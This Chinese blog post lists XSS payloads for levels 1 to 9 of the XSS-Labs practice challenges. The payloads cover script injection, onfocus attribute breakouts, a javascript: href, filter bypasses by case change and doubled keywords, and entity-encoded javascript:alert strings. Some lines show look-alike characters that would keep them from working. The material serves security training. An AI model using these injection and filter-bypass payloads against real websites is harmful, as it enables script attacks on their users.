Xss-Labs做题笔记:Less-1 - Less-9

原创于 2022-02-14 12:40:38 发布 · 354 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#xss #less #javascript

笔记专栏收录该内容

45 篇文章

订阅专栏

本文详细介绍了不同级别的XSS（跨站脚本）攻击方式，从Leve-1到Leve-9，包括各种编码和注入技巧。通过实例展示了如何利用JavaScript在网页中触发弹窗，揭示了XSS攻击的潜在危害及其在网络攻防中的重要地位。

Leve-1:

<script>alert('xss')</script>

Leve-2:

"><script>alert('xss')</script> //

Leve-3:

'οnfοcus=javascript:alert('xss') > //

Leve-4:

"οnfοcus=javascript:alert('xss') "

Leve-5

"><a href=javascript:alert('xss')>xss</a> //

Leve-6

"Onfocus=javascript:alert('xss') "

Leve-7

"oonnfocus=javascriscriptpt:alert('xss') "

Leve-8

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

Leve-9

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;//http://www.baidu.com

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;'http://'&#x29;